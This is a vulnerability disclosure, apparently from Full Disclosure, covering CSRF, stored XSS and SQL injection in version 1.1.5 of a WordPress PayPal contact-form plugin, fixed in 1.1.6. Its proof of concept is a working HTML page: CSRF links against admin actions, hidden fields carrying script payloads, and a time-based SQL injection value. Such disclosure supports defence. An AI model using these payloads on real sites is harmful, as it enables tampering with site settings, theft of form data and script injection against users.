WordPress CP Contact Form With Paypal 1.1.5 CSRF / XSS / SQL Injection

Risk: Medium
Local: No
Remote: Yes

# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection in CP Contact Form with Paypal Wordpress Plugin v1.1.5 # Submitter: Nitin Venkatesh # Product: CP Contact Form with Paypal Wordpress Plugin # Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/ # Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site scripting[CWE-79], Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')[CWE-89] # Affected Versions: v1.1.5 and possibly below. # Tested versions: v1.1.5 # Fixed Version: v1.1.6 # Link to code diff: https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal # Changelog: https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/ # CVE Status: None/Unassigned/Fresh ## Product Information: With CP Contact Form with Paypal you can insert a contact form into a WordPress website and connect it to a PayPal payment. ## Vulnerability Description: The forms in the admin area of the plugin allows CSRF. This gives the capacity for the attacker to add new forms, modify existing form settings, launch XSS attacks, export CSV files of the messages, delete forms, and perform SQL Injection. ## Proof of Concept: <h3>CSRF - Action Links</h3> <ul> <li><a href=" http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create form/item</a></li> <li><a href=" http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export to CSV</a></li> <li><a href=" http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098"> Clone form/item</a></li> <li><a href=" http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update form/item</a></li> <li><a href=" http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete form/item</a></li> </ul> <h3>CSRF, XSS, SQLi - Settings form</h3> <form action=" http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042" method="post"> <input type="hidden" name="cp_contactformpp_post_options" value='' /> <!-- if cp_contactformpp_id is injected with XSS, the other script vectors won't work <input type="hidden" name="cp_contactformpp_id" value='"><script>alert(3);</script>' /> SQL injection possible cp_contactformpp_id <input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" /> --> <input type="hidden" name="cp_contactformpp_id" value='11' /> <input type="hidden" name="fp_from_email" value='asd@evilcorp.org' /> <input type="hidden" name="fp_message" value='The following contact message has been sent:<%INFO%></textarea><script>alert(1);</script>' /> <input type="hidden" name="cu_message" value='Thank you for your message. We will reply you as soon as possible.This is a copy of the data sent:<%INFO%>Best Regards.</textarea><script>alert(2);</script>' /> <input type="hidden" name="submit" value='Save Changes' /> <input type="submit" value="submit" /> </form> ## Solution: Upgrade to v1.1.6 ## Disclosure Timeline: 2015-05-19 - Discovered. Contacted developer on support forums. 2015-05-20 - Mailed developer initial report 2015-05-25 - Patched v1.1.6 released 2015-07-09 - Publishing disclosure to FD ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.



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